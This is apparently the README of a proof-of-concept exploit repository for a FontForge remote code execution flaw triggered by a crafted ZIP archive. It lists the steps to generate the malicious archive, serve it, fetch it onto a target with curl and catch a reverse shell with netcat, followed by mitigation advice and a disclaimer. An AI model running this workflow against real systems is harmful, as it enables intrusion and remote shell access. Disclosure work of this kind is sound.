## https://sploitus.com/exploit?id=C7A317C8-C1BD-596A-A208-BCD9B7617817
# โ ๏ธ CVE-2024-25082 - FontForge ZIP Remote Code Execution (PoC)



Proof-of-Concept exploit for **CVE-2024-25082**, a vulnerability
affecting **FontForge** that allows **Remote Code Execution (RCE)**
through a crafted ZIP archive.
This repository demonstrates how the vulnerability can be exploited in a
controlled lab environment for **security research and educational
purposes**.
------------------------------------------------------------------------
# Vulnerability Overview
- **CVE ID:** CVE-2024-25082\
- **Affected Software:** FontForge\
- **Vulnerability Type:** Remote Code Execution\
- **Attack Vector:** Malicious ZIP archive\
- **Impact:** Arbitrary command execution when the crafted archive is
processed.
The vulnerability occurs due to improper validation of files inside ZIP
archives, allowing an attacker to execute arbitrary commands on the
target system.
------------------------------------------------------------------------
# Repository Structure
CVE-2024-25082-FontForge-ZIP-RCE/
โโโ README.md
โโโ exploit.py
โโโ poc/
โ โโโ exploit.zip
โโโ writeup.md
โโโ License
File Description
------------- --------------------------------------------
exploit.py Generates the malicious ZIP payload
poc/ Contains generated proof-of-concept files
writeup.md Technical explanation of the vulnerability
------------------------------------------------------------------------
# Requirements
- Python 3.x
- Netcat
Install optional tools:
``` bash
sudo apt install netcat
```
------------------------------------------------------------------------
# Usage
## 1๏ธโฃ Generate the malicious payload
``` bash
python3 exploit.py --lhost --lport
```
This will generate a malicious `exploit.zip` file.
------------------------------------------------------------------------
## 2๏ธโฃ Serve the exploit
``` bash
python3 -m http.server 8080
```
------------------------------------------------------------------------
## 3๏ธโฃ Upload from the target system
``` bash
curl http://:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
```
------------------------------------------------------------------------
## 4๏ธโฃ Catch the reverse shell
``` bash
nc -lvnp
```
If successful, a shell should be obtained from the target system.
------------------------------------------------------------------------
# Reproducing the Vulnerability
A reproducible vulnerable environment is provided inside the `docker/`
directory.
Example:
``` bash
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
```
This allows safe testing without affecting production systems.
------------------------------------------------------------------------
# Security Impact
An attacker able to upload or control ZIP files processed by the
vulnerable application may:
- Execute arbitrary system commands
- Gain remote shell access
- Compromise the host system
------------------------------------------------------------------------
# Mitigation
Recommended mitigation steps:
- Update FontForge to a patched version
- Validate uploaded archive contents
- Restrict file upload functionality
- Use sandboxing when processing fonts
------------------------------------------------------------------------
# Disclaimer
This repository contains **Proof-of-Concept code for a publicly
disclosed vulnerability**.
The code is provided strictly for:
- Security research
- Educational purposes
- Authorized penetration testing
Do **NOT** use this code against systems without explicit permission.
The author assumes **no responsibility for misuse or damage** caused by
this software.
------------------------------------------------------------------------
# Author
**Moamen Elmaghrabi**
Cybersecurity Student\
Penetration Testing & Exploit Development
------------------------------------------------------------------------
# License
This project is licensed under the MIT License.\
See the `LICENSE` file for details.